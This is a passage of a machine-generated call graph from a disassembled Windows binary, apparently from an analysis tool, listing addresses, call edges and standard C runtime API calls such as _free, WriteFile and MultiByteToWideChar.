c061db 5294->5305 5296 c06193 5295->5296 5297 c04869 _free 15 API calls 5295->5297 5298 c04869 _free 15 API calls 5296->5298 5302 c061a5 5296->5302 5297->5296 5298->5302 5299 c04869 _free 15 API calls 5300 c061b7 5299->5300 5301 c061c9 5300->5301 5303 c04869 _free 15 API calls 5300->5303 5304 c04869 _free 15 API calls 5301->5304 5301->5305 5302->5299 5302->5300 5303->5301 5304->5305 5305->5265 5307 c06687 5306->5307 5311 c066a5 5306->5311 5308 c0621b __fassign 15 API calls 5307->5308 5307->5311 5309 c0669f 5308->5309 5310 c04869 _free 15 API calls 5309->5310 5310->5311 5311->5248 5312->5237 5345 c06a82 5313->5345 5316 c06b6f 5317 c06b7b _abort 5316->5317 5322 c06ba8 _abort 5317->5322 5323 c06ba2 _abort 5317->5323 5359 c044a8 GetLastError 5317->5359 5319 c06bf4 5320 c047f9 __dosmaperr 15 API calls 5319->5320 5321 c06bf9 5320->5321 5378 c0473d 5321->5378 5327 c06c20 5322->5327 5381 c056e2 EnterCriticalSection 5322->5381 5323->5319 5323->5322 5326 c06bd7 _abort 5323->5326 5326->5169 5328 c06c7f 5327->5328 5330 c06c77 5327->5330 5338 c06caa 5327->5338 5382 c0572a LeaveCriticalSection 5327->5382 5328->5338 5383 c06b66 5328->5383 5333 c03793 _abort 23 API calls 5330->5333 5333->5328 5335 c04424 _abort 33 API calls 5339 c06d0d 5335->5339 5337 c06b66 _abort 33 API calls 5337->5338 5386 c06d2f 5338->5386 5339->5326 5340 c04424 _abort 33 API calls 5339->5340 5340->5326 5342 c0458f _abort 5341->5342 5343 c045bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5342->5343 5344 c0468c _abort _ValidateLocalCookies 5343->5344 5344->5172 5348 c06a28 5345->5348 5347 c03f29 5347->5169 5347->5316 5349 c06a34 ___scrt_is_nonwritable_in_current_image 5348->5349 5354 c056e2 EnterCriticalSection 5349->5354 5351 c06a42 5355 c06a76 5351->5355 5353 c06a69 _abort 5353->5347 5354->5351 5358 c0572a LeaveCriticalSection 5355->5358 5357 c06a80 5357->5353 5358->5357 5360 c044c1 5359->5360 5361 c044c7 5359->5361 5363 c05904 _abort 6 API calls 5360->5363 5362 c0480c _abort 12 API calls 5361->5362 5365 c0451e SetLastError 5361->5365 5364 c044d9 5362->5364 5363->5361 5367 c0595a _abort 6 API calls 5364->5367 5371 c044e1 5364->5371 5366 c04527 5365->5366 5366->5323 5369 c044f6 5367->5369 5368 c04869 _free 12 API calls 5370 c044e7 5368->5370 5369->5371 5372 c044fd 5369->5372 5373 c04515 SetLastError 5370->5373 5371->5368 5374 c04296 _abort 12 API calls 5372->5374 5373->5366 5375 c04508 5374->5375 5376 c04869 _free 12 API calls 5375->5376 5377 c0450e 5376->5377 5377->5365 5377->5373 5390 c046c2 5378->5390 5380 c04749 5380->5326 5381->5327 5382->5330 5384 c04424 _abort 33 API calls 5383->5384 5385 c06b6b 5384->5385 5385->5337 5387 c06d35 5386->5387 5388 c06cfe 5386->5388 5402 c0572a LeaveCriticalSection 5387->5402 5388->5326 5388->5335 5388->5339 5391 c044a8 __dosmaperr 15 API calls 5390->5391 5392 c046d8 5391->5392 5393 c046e6 _ValidateLocalCookies 5392->5393 5398 c0474d IsProcessorFeaturePresent 5392->5398 5393->5380 5395 c0473c 5396 c046c2 _abort 21 API calls 5395->5396 5397 c04749 5396->5397 5397->5380 5399 c04758 5398->5399 5400 c04573 _abort 3 API calls 5399->5400 5401 c0476d GetCurrentProcess TerminateProcess 5400->5401 5401->5395 5402->5388 5403->5106 5407 c0572a LeaveCriticalSection 5404->5407 5406 c052e1 5406->5106 5407->5406 5409 c03f8f 5408->5409 5410 c03f85 5408->5410 5409->5410 5411 c04424 _abort 33 API calls 5409->5411 5410->5114 5410->5115 5412 c03fb0 5411->5412 5416 c072d1 5412->5416 5417 c072e4 5416->5417 5418 c03fc9 5416->5418 5417->5418 5424 c06754 5417->5424 5420 c072fe 5418->5420 5421 c07311 5420->5421 5422 c07326 5420->5422 5421->5422 5423 c05249 __fassign 33 API calls 5421->5423 5422->5410 5423->5422 5425 c06760 ___scrt_is_nonwritable_in_current_image 5424->5425 5426 c04424 _abort 33 API calls 5425->5426 5427 c06769 5426->5427 5428 c067b7 _abort 5427->5428 5436 c056e2 EnterCriticalSection 5427->5436 5428->5418 5430 c06787 5437 c067cb 5430->5437 5435 c03f24 _abort 33 API calls 5435->5428 5436->5430 5438 c0679b 5437->5438 5439 c067d9 __fassign 5437->5439 5441 c067ba 5438->5441 5439->5438 5440 c06507 __fassign 15 API calls 5439->5440 5440->5438 5444 c0572a LeaveCriticalSection 5441->5444 5443 c067ae 5443->5428 5443->5435 5444->5443 5448 c0507a _ValidateLocalCookies 5445->5448 5449 c04fd0 5445->5449 5447 c05031 5465 c07cd1 5447->5465 5448->5130 5453 c0634d 5449->5453 5452 c07cd1 38 API calls 5452->5448 5454 c03f72 __fassign 33 API calls 5453->5454 5455 c0636d MultiByteToWideChar 5454->5455 5457 c063ab 5455->5457 5458 c06443 _ValidateLocalCookies 5455->5458 5459 c062ff 16 API calls 5457->5459 5463 c063cc _abort __alloca_probe_16 5457->5463 5458->5447 5459->5463 5460 c0643d 5470 c0646a 5460->5470 5462 c06411 MultiByteToWideChar 5462->5460 5464 c0642d GetStringTypeW 5462->5464 5463->5460 5463->5462 5464->5460 5466 c03f72 __fassign 33 API calls 5465->5466 5467 c07ce4 5466->5467 5474 c07ab4 5467->5474 5469 c05052 5469->5452 5471 c06476 5470->5471 5473 c06487 5470->5473 5472 c04869 _free 15 API calls 5471->5472 5471->5473 5472->5473 5473->5458 5475 c07acf 5474->5475 5476 c07af5 MultiByteToWideChar 5475->5476 5477 c07ca9 _ValidateLocalCookies 5476->5477 5478 c07b1f 5476->5478 5477->5469 5480 c062ff 16 API calls 5478->5480 5482 c07b40 __alloca_probe_16 5478->5482 5479 c07b89 MultiByteToWideChar 5481 c07ba2 5479->5481 5494 c07bf5 5479->5494 5480->5482 5499 c05a15 5481->5499 5482->5479 5482->5494 5484 c0646a __freea 15 API calls 5484->5477 5485 c07bb9 5486 c07c04 5485->5486 5487 c07bcc 5485->5487 5485->5494 5488 c07c25 __alloca_probe_16 5486->5488 5489 c062ff 16 API calls 5486->5489 5490 c05a15 6 API calls 5487->5490 5487->5494 5491 c07c9a 5488->5491 5493 c05a15 6 API calls 5488->5493 5489->5488 5490->5494 5492 c0646a __freea 15 API calls 5491->5492 5492->5494 5495 c07c79 5493->5495 5494->5484 5495->5491 5496 c07c88 WideCharToMultiByte 5495->5496 5496->5491 5497 c07cc8 5496->5497 5498 c0646a __freea 15 API calls 5497->5498 5498->5494 5500 c05741 _abort 5 API calls 5499->5500 5501 c05a3c 5500->5501 5504 c05a45 _ValidateLocalCookies 5501->5504 5505 c05a9d 5501->5505 5503 c05a85 LCMapStringW 5503->5504 5504->5485 5506 c05741 _abort 5 API calls 5505->5506 5507 c05ac4 _ValidateLocalCookies 5506->5507 5507->5503 5509 c04d5d ___scrt_is_nonwritable_in_current_image 5508->5509 5516 c056e2 EnterCriticalSection 5509->5516 5511 c04d67 5517 c04dbc 5511->5517 5515 c04d80 _abort 5515->5144 5516->5511 5529 c054dc 5517->5529 5519 c04e0a 5520 c054dc 21 API calls 5519->5520 5521 c04e26 5520->5521 5522 c054dc 21 API calls 5521->5522 5523 c04e44 5522->5523 5524 c04d74 5523->5524 5525 c04869 _free 15 API calls 5523->5525 5526 c04d88 5524->5526 5525->5524 5543 c0572a LeaveCriticalSection 5526->5543 5528 c04d92 5528->5515 5530 c054ed 5529->5530 5534 c054e9 5529->5534 5531 c054f4 5530->5531 5536 c05507 _abort 5530->5536 5532 c047f9 __dosmaperr 15 API calls 5531->5532 5533 c054f9 5532->5533 5535 c0473d _abort 21 API calls 5533->5535 5534->5519 5535->5534 5536->5534 5537 c05535 5536->5537 5538 c0553e 5536->5538 5539 c047f9 __dosmaperr 15 API calls 5537->5539 5538->5534 5540 c047f9 __dosmaperr 15 API calls 5538->5540 5541 c0553a 5539->5541 5540->5541 5542 c0473d _abort 21 API calls 5541->5542 5542->5534 5543->5528 5545 c03f72 __fassign 33 API calls 5544->5545 5546 c05571 5545->5546 5546->4936 5548 c0356a _abort 5547->5548 5549 c03582 5548->5549 5562 c036b8 GetModuleHandleW 5548->5562 5569 c056e2 EnterCriticalSection 5549->5569 5556 c0358a 5558 c035ff _abort 5556->5558 5570 c03c97 5556->5570 5557 c03671 _abort 5557->4968 5573 c03668 5558->5573 5563 c03576 5562->5563 5563->5549 5564 c036fc GetModuleHandleExW 5563->5564 5565 c03726 GetProcAddress 5564->5565 5566 c0373b 5564->5566 5565->5566 5567 c03758 _ValidateLocalCookies 5566->5567 5568 c0374f FreeLibrary 5566->5568 5567->5549 5568->5567 5569->5556 5584 c039d0 5570->5584 5604 c0572a LeaveCriticalSection 5573->5604 5575 c03641 5575->5557 5576 c03677 5575->5576 5605 c05b1f 5576->5605 5578 c03681 5579 c036a5 5578->5579 5580 c03685 GetPEB 5578->5580 5581 c036fc _abort 3 API calls 5579->5581 5580->5579 5582 c03695 GetCurrentProcess TerminateProcess 5580->5582 5583 c036ad ExitProcess 5581->5583 5582->5579 5587 c0397f 5584->5587 5586 c039f4 5586->5558 5588 c0398b ___scrt_is_nonwritable_in_current_image 5587->5588 5595 c056e2 EnterCriticalSection 5588->5595 5590 c03999 5596 c03a20 5590->5596 5592 c039a6 5600 c039c4 5592->5600 5594 c039b7 _abort 5594->5586 5595->5590 5597 c03a40 _ValidateLocalCookies 5596->5597 5598 c03a48 5596->5598 5597->5592 5598->5597 5599 c04869 _free 15 API calls 5598->5599 5599->5597 5603 c0572a LeaveCriticalSection 5600->5603 5602 c039ce 5602->5594 5603->5602 5604->5575 5606 c05b44 5605->5606 5608 c05b3a _ValidateLocalCookies 5605->5608 5607 c05741 _abort 5 API calls 5606->5607 5607->5608 5608->5578 6082 c0324d 6083 c0522b 46 API calls 6082->6083 6084 c0325f 6083->6084 6093 c0561e GetEnvironmentStringsW 6084->6093 6087 c0326a 6089 c04869 _free 15 API calls 6087->6089 6090 c0329f 6089->6090 6091 c03275 6092 c04869 _free 15 API calls 6091->6092 6092->6087 6094 c05635 6093->6094 6104 c05688 6093->6104 6097 c0563b WideCharToMultiByte 6094->6097 6095 c05691 FreeEnvironmentStringsW 6096 c03264 6095->6096 6096->6087 6105 c032a5 6096->6105 6098 c05657 6097->6098 6097->6104 6099 c062ff 16 API calls 6098->6099 6100 c0565d 6099->6100 6101 c0567a 6100->6101 6102 c05664 WideCharToMultiByte 6100->6102 6103 c04869 _free 15 API calls 6101->6103 6102->6101 6103->6104 6104->6095 6104->6096 6106 c032ba 6105->6106 6107 c0480c _abort 15 API calls 6106->6107 6108 c032e1 6107->6108 6110 c03345 6108->6110 6112 c0480c _abort 15 API calls 6108->6112 6113 c03347 6108->6113 6117 c03369 6108->6117 6120 c04869 _free 15 API calls 6108->6120 6122 c03eca 6108->6122 6109 c04869 _free 15 API calls 6111 c0335f 6109->6111 6110->6109 6111->6091 6112->6108 6115 c03376 15 API calls 6113->6115 6116 c0334d 6115->6116 6118 c04869 _free 15 API calls 6116->6118 6119 c0474d _abort 6 API calls 6117->6119 6118->6110 6121 c03375 6119->6121 6120->6108 6123 c03ed7 6122->6123 6124 c03ee5 6122->6124 6123->6124 6129 c03efc 6123->6129 6125 c047f9 __dosmaperr 15 API calls 6124->6125 6126 c03eed 6125->6126 6127 c0473d _abort 21 API calls 6126->6127 6128 c03ef7 6127->6128 6128->6108 6129->6128 6130 c047f9 __dosmaperr 15 API calls 6129->6130 6130->6126 5650 c055ce GetCommandLineA GetCommandLineW 5841 c03d8f 5842 c03d9e 5841->5842 5846 c03db2 5841->5846 5844 c04869 _free 15 API calls 5842->5844 5842->5846 5843 c04869 _free 15 API calls 5845 c03dc4 5843->5845 5844->5846 5847 c04869 _free 15 API calls 5845->5847 5846->5843 5848 c03dd7 5847->5848 5849 c04869 _free 15 API calls 5848->5849 5850 c03de8 5849->5850 5851 c04869 _free 15 API calls 5850->5851 5852 c03df9 5851->5852 6206 c0430f 6207 c0431a 6206->6207 6208 c0432a 6206->6208 6212 c04330 6207->6212 6211 c04869 _free 15 API calls 6211->6208 6213 c04343 6212->6213 6214 c04349 6212->6214 6215 c04869 _free 15 API calls 6213->6215 6216 c04869 _free 15 API calls 6214->6216 6215->6214 6217 c04355 6216->6217 6218 c04869 _free 15 API calls 6217->6218 6219 c04360 6218->6219 6220 c04869 _free 15 API calls 6219->6220 6221 c0436b 6220->6221 6222 c04869 _free 15 API calls 6221->6222 6223 c04376 6222->6223 6224 c04869 _free 15 API calls 6223->6224 6225 c04381 6224->6225 6226 c04869 _free 15 API calls 6225->6226 6227 c0438c 6226->6227 6228 c04869 _free 15 API calls 6227->6228 6229 c04397 6228->6229 6230 c04869 _free 15 API calls 6229->6230 6231 c043a2 6230->6231 6232 c04869 _free 15 API calls 6231->6232 6233 c043b0 6232->6233 6238 c041f6 6233->6238 6244 c04102 6238->6244 6240 c0421a 6241 c04246 6240->6241 6257 c04163 6241->6257 6243 c0426a 6243->6211 6245 c0410e ___scrt_is_nonwritable_in_current_image 6244->6245 6252 c056e2 EnterCriticalSection 6245->6252 6247 c04142 6253 c04157 6247->6253 6249 c04118 6249->6247 6251 c04869 _free 15 API calls 6249->6251 6250 c0414f _abort 6250->6240 6251->6247 6252->6249 6256 c0572a LeaveCriticalSection 6253->6256 6255 c04161 6255->6250 6256->6255 6258 c0416f ___scrt_is_nonwritable_in_current_image 6257->6258 6265 c056e2 EnterCriticalSection 6258->6265 6260 c04179 6261 c043d9 _abort 15 API calls 6260->6261 6262 c0418c 6261->6262 6266 c041a2 6262->6266 6264 c0419a _abort 6264->6243 6265->6260 6269 c0572a LeaveCriticalSection 6266->6269 6268 c041ac 6268->6264 6269->6268 5651 c05fd0 5652 c05fdc ___scrt_is_nonwritable_in_current_image 5651->5652 5663 c056e2 EnterCriticalSection 5652->5663 5654 c05fe3 5664 c05c8b 5654->5664 5656 c05ff2 5662 c06001 5656->5662 5677 c05e64 GetStartupInfoW 5656->5677 5661 c06012 _abort 5688 c0601d 5662->5688 5663->5654 5665 c05c97 ___scrt_is_nonwritable_in_current_image 5664->5665 5666 c05ca4 5665->5666 5667 c05cbb 5665->5667 5669 c047f9 __dosmaperr 15 API calls 5666->5669 5691 c056e2 EnterCriticalSection 5667->5691 5670 c05ca9 5669->5670 5671 c0473d _abort 21 API calls 5670->5671 5672 c05cb3 _abort 5671->5672 5672->5656 5675 c05cf3 5699 c05d1a 5675->5699 5676 c05cc7 5676->5675 5692 c05bdc 5676->5692 5678 c05e81 5677->5678 5680 c05f13 5677->5680 5679 c05c8b 22 API calls 5678->5679 5678->5680 5681 c05eaa 5679->5681 5683 c05f1a 5680->5683 5681->5680 5682 c05ed8 GetFileType 5681->5682 5682->5681 5687 c05f21 5683->5687 5684 c05f64 GetStdHandle 5684->5687 5685 c05fcc 5685->5662 5686 c05f77 GetFileType 5686->5687 5687->5684 5687->5685 5687->5686 5708 c0572a LeaveCriticalSection 5688->5708 5690 c06024 5690->5661 5691->5676 5693 c0480c _abort 15 API calls 5692->5693 5695 c05bee 5693->5695 5694 c05bfb 5696 c04869 _free 15 API calls 5694->5696 5695->5694 5702 c059b3 5695->5702 5697 c05c4d 5696->5697 5697->5676 5707 c0572a LeaveCriticalSection 5699->5707 5701 c05d21 5701->5672 5703 c05741 _abort 5 API calls 5702->5703 5704 c059da 5703->5704 5705 c059e3 _ValidateLocalCookies 5704->5705 5706 c059f8 InitializeCriticalSectionAndSpinCount 5704->5706 5705->5695 5706->5705 5707->5701 5708->5690 6270 c07a10 6273 c07a27 6270->6273 6274 c07a35 6273->6274 6275 c07a49 6273->6275 6276 c047f9 __dosmaperr 15 API calls 6274->6276 6277 c07a51 6275->6277 6278 c07a63 6275->6278 6279 c07a3a 6276->6279 6280 c047f9 __dosmaperr 15 API calls 6277->6280 6281 c03f72 __fassign 33 API calls 6278->6281 6284 c07a22 6278->6284 6282 c0473d _abort 21 API calls 6279->6282 6283 c07a56 6280->6283 6281->6284 6282->6284 6285 c0473d _abort 21 API calls 6283->6285 6285->6284 6131 c07351 6132 c0735e 6131->6132 6133 c0480c _abort 15 API calls 6132->6133 6134 c07378 6133->6134 6135 c04869 _free 15 API calls 6134->6135 6136 c07384 6135->6136 6137 c0480c _abort 15 API calls 6136->6137 6141 c073aa 6136->6141 6138 c0739e 6137->6138 6140 c04869 _free 15 API calls 6138->6140 6139 c059b3 6 API calls 6139->6141 6140->6141 6141->6139 6142 c073b6 6141->6142 6143 c07414 6141->6143 5853 c06893 GetProcessHeap 6144 c02f53 6145 c02f62 6144->6145 6146 c02f7e 6144->6146 6145->6146 6147 c02f68 6145->6147 6148 c0522b 46 API calls 6146->6148 6149 c047f9 __dosmaperr 15 API calls 6147->6149 6150 c02f85 GetModuleFileNameA 6148->6150 6151 c02f6d 6149->6151 6152 c02fa9 6150->6152 6153 c0473d _abort 21 API calls 6151->6153 6167 c03077 6152->6167 6155 c02f77 6153->6155 6159 c02fe8 6162 c03077 33 API calls 6159->6162 6160 c02fdc 6161 c047f9 __dosmaperr 15 API calls 6160->6161 6166 c02fe1 6161->6166 6164 c02ffe 6162->6164 6163 c04869 _free 15 API calls 6163->6155 6165 c04869 _free 15 API calls 6164->6165 6164->6166 6165->6166 6166->6163 6169 c0309c 6167->6169 6168 c055b6 33 API calls 6168->6169 6169->6168 6171 c030fc 6169->6171 6170 c02fc6 6173 c031ec 6170->6173 6171->6170 6172 c055b6 33 API calls 6171->6172 6172->6171 6174 c03201 6173->6174 6175 c02fd3 6173->6175 6174->6175 6176 c0480c _abort 15 API calls 6174->6176 6175->6159 6175->6160 6177 c0322f 6176->6177 6178 c04869 _free 15 API calls 6177->6178 6178->6175 6286 c07419 6296 c07fb2 6286->6296 6290 c07426 6309 c0828e 6290->6309 6293 c07450 6294 c04869 _free 15 API calls 6293->6294 6295 c0745b 6294->6295 6313 c07fbb 6296->6313 6298 c07421 6299 c081ee 6298->6299 6300 c081fa ___scrt_is_nonwritable_in_current_image 6299->6300 6333 c056e2 EnterCriticalSection 6300->6333 6302 c08270 6347 c08285 6302->6347 6304 c08244 DeleteCriticalSection 6307 c04869 _free 15 API calls 6304->6307 6305 c08205 6305->6302 6305->6304 6334 c0901c 6305->6334 6307->6305 6308 c0827c _abort 6308->6290 6310 c082a4 6309->6310 6311 c07435 DeleteCriticalSection 6309->6311 6310->6311 6312 c04869 _free 15 API calls 6310->6312 6311->6290 6311->6293 6312->6311 6314 c07fc7 ___scrt_is_nonwritable_in_current_image 6313->6314 6323 c056e2 EnterCriticalSection 6314->6323 6316 c0806a 6328 c0808a 6316->6328 6319 c08076 _abort 6319->6298 6321 c07fd6 6321->6316 6322 c07f6b 61 API calls 6321->6322 6324 c07465 EnterCriticalSection 6321->6324 6325 c08060 6321->6325 6322->6321 6323->6321 6324->6321 6331 c07479 LeaveCriticalSection 6325->6331 6327 c08068 6327->6321 6332 c0572a LeaveCriticalSection 6328->6332 6330 c08091 6330->6319 6331->6327 6332->6330 6333->6305 6335 c09028 ___scrt_is_nonwritable_in_current_image 6334->6335 6336 c09039 6335->6336 6337 c0904e 6335->6337 6338 c047f9 __dosmaperr 15 API calls 6336->6338 6346 c09049 _abort 6337->6346 6350 c07465 EnterCriticalSection 6337->6350 6340 c0903e 6338->6340 6342 c0473d _abort 21 API calls 6340->6342 6341 c0906a 6351 c08fa6 6341->6351 6342->6346 6344 c09075 6367 c09092 6344->6367 6346->6305 6605 c0572a LeaveCriticalSection 6347->6605 6349 c0828c 6349->6308 6350->6341 6352 c08fb3 6351->6352 6353 c08fc8 6351->6353 6354 c047f9 __dosmaperr 15 API calls 6352->6354 6358 c08fc3 6353->6358 6370 c07f05 6353->6370 6355 c08fb8 6354->6355 6357 c0473d _abort 21 API calls 6355->6357 6357->6358 6358->6344 6360 c0828e 15 API calls 6361 c08fe4 6360->6361 6376 c0732b 6361->6376 6363 c08fea 6383 c09d4e 6363->6383 6366 c04869 _free 15 API calls 6366->6358 6604 c07479 LeaveCriticalSection 6367->6604 6369 c0909a 6369->6346 6371 c07f1d 6370->6371 6372 c07f19 6370->6372 6371->6372 6373 c0732b 21 API calls 6371->6373 6372->6360 6374 c07f3d 6373->6374 6398 c089a7 6374->6398 6377 c07337 6376->6377 6378 c0734c 6376->6378 6379 c047f9 __dosmaperr 15 API calls 6377->6379 6378->6363 6380 c0733c 6379->6380 6381 c0473d _abort 21 API calls 6380->6381 6382 c07347 6381->6382 6382->6363 6384 c09d72 6383->6384 6385 c09d5d 6383->6385 6386 c09dad 6384->6386 6390 c09d99 6384->6390 6387 c047e6 __dosmaperr 15 API calls 6385->6387 6388 c047e6 __dosmaperr 15 API calls 6386->6388 6389 c09d62 6387->6389 6391 c09db2 6388->6391 6392 c047f9 __dosmaperr 15 API calls 6389->6392 6561 c09d26 6390->6561 6394 c047f9 __dosmaperr 15 API calls 6391->6394 6395 c08ff0 6392->6395 6396 c09dba 6394->6396 6395->6358 6395->6366 6397 c0473d _abort 21 API calls 6396->6397 6397->6395 6399 c089b3 ___scrt_is_nonwritable_in_current_image 6398->6399 6400 c089d3 6399->6400 6401 c089bb 6399->6401 6403 c08a71 6400->6403 6408 c08a08 6400->6408 6423 c047e6 6401->6423 6405 c047e6 __dosmaperr 15 API calls 6403->6405 6407 c08a76 6405->6407 6406 c047f9 __dosmaperr 15 API calls 6413 c089c8 _abort 6406->6413 6409 c047f9 __dosmaperr 15 API calls 6407->6409 6426 c05d23 EnterCriticalSection 6408->6426 6411 c08a7e 6409->6411 6414 c0473d _abort 21 API calls 6411->6414 6412 c08a0e 6415 c08a2a 6412->6415 6416 c08a3f 6412->6416 6413->6372 6414->6413 6418 c047f9 __dosmaperr 15 API calls 6415->6418 6427 c08a92 6416->6427 6419 c08a2f 6418->6419 6421 c047e6 __dosmaperr 15 API calls 6419->6421 6420 c08a3a 6476 c08a69 6420->6476 6421->6420 6424 c044a8 __dosmaperr 15 API calls 6423->6424 6425 c047eb 6424->6425 6425->6406 6426->6412 6428 c08ac0 6427->6428 6434 c08ab9 _ValidateLocalCookies 6427->6434 6429 c08ae3 6428->6429 6430 c08ac4 6428->6430 6432 c08b34 6429->6432 6433 c08b17 6429->6433 6431 c047e6 __dosmaperr 15 API calls 6430->6431 6435 c08ac9 6431->6435 6437 c08b4a 6432->6437 6479 c08f8b 6432->6479 6436 c047e6 __dosmaperr 15 API calls 6433->6436 6434->6420 6438 c047f9 __dosmaperr 15 API calls 6435->6438 6439 c08b1c 6436->6439 6482 c08637 6437->6482 6441 c08ad0 6438->6441 6444 c047f9 __dosmaperr 15 API calls 6439->6444 6445 c0473d _abort 21 API calls 6441->6445 6448 c08b24 6444->6448 6445->6434 6446 c08b91 6452 c08ba5 6446->6452 6453 c08beb WriteFile 6446->6453 6447 c08b58 6449 c08b5c 6447->6449 6450 c08b7e 6447->6450 6451 c0473d _abort 21 API calls 6448->6451 6454 c08c52 6449->6454 6489 c085ca 6449->6489 6494 c08417 GetConsoleCP 6450->6494 6451->6434 6457 c08bdb 6452->6457 6458 c08bad 6452->6458 6456 c08c0e GetLastError 6453->6456 6461 c08b74 6453->6461 6454->6434 6465 c047f9 __dosmaperr 15 API calls 6454->6465 6456->6461 6514 c086ad 6457->6514 6462 c08bb2 6458->6462 6463 c08bcb 6458->6463 6461->6434 6461->6454 6467 c08c2e 6461->6467 6462->6454 6503 c0878c 6462->6503 6508 c0887a 6463->6508 6466 c08c77 6465->6466 6469 c047e6 __dosmaperr 15 API calls 6466->6469 6470 c08c35 6467->6470 6471 c08c49 6467->6471 6469->6434 6473 c047f9 __dosmaperr 15 API calls 6470->6473 6519 c047c3 6471->6519 6474 c08c3a 6473->6474 6475 c047e6 __dosmaperr 15 API calls 6474->6475 6475->6434 6560 c05d46 LeaveCriticalSection 6476->6560 6478 c08a6f 6478->6413 6524 c08f0d 6479->6524 6546 c07eaf 6482->6546 6484 c0864c 6484->6446 6484->6447 6485 c08647 6485->6484 6486 c04424 _abort 33 API calls 6485->6486 6487 c0866f 6486->6487 6487->6484 6488 c0868d GetConsoleMode 6487->6488 6488->6484 6490 c08624 6489->6490 6493 c085ef 6489->6493 6490->6461 6491 c09101 WriteConsoleW CreateFileW 6491->6493 6492 c08626 GetLastError 6492->6490 6493->6490 6493->6491 6493->6492 6496 c0858c _ValidateLocalCookies 6494->6496 6498 c0847a 6494->6498 6496->6461 6497 c072b7 35 API calls __fassign 6497->6498 6498->6496 6498->6497 6499 c08500 WideCharToMultiByte 6498->6499 6502 c08557 WriteFile 6498->6502 6555 c06052 6498->6555 6499->6496 6500 c08526 WriteFile 6499->6500 6500->6498 6501 c085af GetLastError 6500->6501 6501->6496 6502->6498 6502->6501 6504 c0879b 6503->6504 6505 c08819 WriteFile 6504->6505 6506 c0885d _ValidateLocalCookies 6504->6506 6505->6504 6507 c0885f GetLastError 6505->6507 6506->6461 6507->6506 6513 c08889 6508->6513 6509 c08994 _ValidateLocalCookies 6509->6461 6510 c0890b WideCharToMultiByte 6511 c08940 WriteFile 6510->6511 6512 c0898c GetLastError 6510->6512 6511->6512 6511->6513 6512->6509 6513->6509 6513->6510 6513->6511 6517 c086bc 6514->6517 6515 c0872e WriteFile 6515->6517 6518 c08771 GetLastError 6515->6518 6516 c0876f _ValidateLocalCookies 6516->6461 6517->6515 6517->6516 6518->6516 6520 c047e6 __dosmaperr 15 API calls 6519->6520 6521 c047ce __dosmaperr 6520->6521 6522 c047f9 __dosmaperr 15 API calls 6521->6522 6523 c047e1 6522->6523 6523->6434 6533 c05dfa 6524->6533 6526 c08f1f 6527 c08f27 6526->6527 6528 c08f38 SetFilePointerEx 6526->6528 6529 c047f9 __dosmaperr 15 API calls 6527->6529 6530 c08f50 GetLastError 6528->6530 6531 c08f2c 6528->6531 6529->6531 6532 c047c3 __dosmaperr 15 API calls 6530->6532 6531->6437 6532->6531 6534 c05e07 6533->6534 6536 c05e1c 6533->6536 6535 c047e6 __dosmaperr 15 API calls 6534->6535 6538 c05e0c 6535->6538 6537 c047e6 __dosmaperr 15 API calls 6536->6537 6540 c05e41 6536->6540 6541 c05e4c 6537->6541 6539 c047f9 __dosmaperr 15 API calls 6538->6539 6542 c05e14 6539->6542 6540->6526 6543 c047f9 __dosmaperr 15 API calls 6541->6543 6542->6526 6544 c05e54 6543->6544 6545 c0473d _abort 21 API calls 6544->6545 6545->6542 6547 c07ec9 6546->6547 6548 c07ebc 6546->6548 6550 c047f9 __dosmaperr 15 API calls 6547->6550 6552 c07ed5 6547->6552 6549 c047f9 __dosmaperr 15 API calls 6548->6549 6551 c07ec1 6549->6551 6553 c07ef6 6550->6553 6551->6485 6552->6485 6554 c0473d _abort 21 API calls 6553->6554 6554->6551 6556 c04424 _abort 33 API calls 6555->6556 6557 c0605d 6556->6557 6558 c072d1 __fassign 33 API calls 6557->6558 6559 c0606d 6558->6559 6559->6498 6560->6478 6564 c09ca4 6561->6564 6563 c09d4a 6563->6395 6565 c09cb0 ___scrt_is_nonwritable_in_current_image 6564->6565 6575 c05d23 EnterCriticalSection 6565->6575 6567 c09cbe 6568 c09cf0 6567->6568 6569 c09ce5 6567->6569 6570 c047f9 __dosmaperr 15 API calls 6568->6570 6576 c09dcd 6569->6576 6572 c09ceb 6570->6572 6591 c09d1a 6572->6591 6574 c09d0d _abort 6574->6563 6575->6567 6577 c05dfa 21 API calls 6576->6577 6579 c09ddd 6577->6579 6578 c09de3 6594 c05d69 6578->6594 6579->6578 6581 c09e15 6579->6581 6583 c05dfa 21 API calls 6579->6583 6581->6578 6584 c05dfa 21 API calls 6581->6584 6586 c09e0c 6583->6586 6587 c09e21 CloseHandle 6584->6587 6585 c09e5d 6585->6572 6589 c05dfa 21 API calls 6586->6589 6587->6578 6590 c09e2d GetLastError 6587->6590 6588 c047c3 __dosmaperr 15 API calls 6588->6585 6589->6581 6590->6578 6603 c05d46 LeaveCriticalSection 6591->6603 6593 c09d24 6593->6574 6595 c05d78 6594->6595 6596 c05ddf 6594->6596 6595->6596 6601 c05da2 6595->6601 6597 c047f9 __dosmaperr 15 API calls 6596->6597 6598 c05de4 6597->6598 6599 c047e6 __dosmaperr 15 API calls 6598->6599 6600 c05dcf 6599->6600 6600->6585 6600->6588 6601->6600 6602 c05dc9 SetStdHandle 6601->6602 6602->6600 6603->6593 6604->6369 6605->6349 6606 c07d1c 6607 c0522b 46 API calls 6606->6607 6608 c07d21 6607->6608 6179 c0365d 6180 c03e89 33 API calls 6179->6180 6181 c03665 6180->6181 5854 c04ba0 5855 c04bac 5854->5855 5856 c04bb6 FindClose 5855->5856 5857 c04bbd _ValidateLocalCookies 5855->5857 5856->5857 6182 c09160 6185 c0917e 6182->6185 6184 c09176 6186 c09183 6185->6186 6187 c099d3 16 API calls 6186->6187 6188 c09218 6186->6188 6189 c093af 6187->6189 6188->6184 6189->6184 5709 c08ce1 5710 c08d01 5709->5710 5713 c08d38 5710->5713 5712 c08d2b 5714 c08d3f 5713->5714 5715 c08d5f 5714->5715 5717 c08da0 5714->5717 5716 c0988e 5715->5716 5720 c09997 16 API calls 5715->5720 5716->5712 5717->5716 5718 c09997 16 API calls 5717->5718 5719 c08dee 5718->5719 5719->5712 5721 c098be 5720->5721 5721->5712 5858 c056a1 5859 c056ac 5858->5859 5860 c059b3 6 API calls 5859->5860 5861 c056d5 5859->5861 5863 c056d1 5859->5863 5860->5859 5864 c056f9 5861->5864 5865 c05725 5864->5865 5866 c05706 5864->5866 5865->5863 5867 c05710 DeleteCriticalSection 5866->5867 5867->5865 5867->5867 5722 c033e5 5723 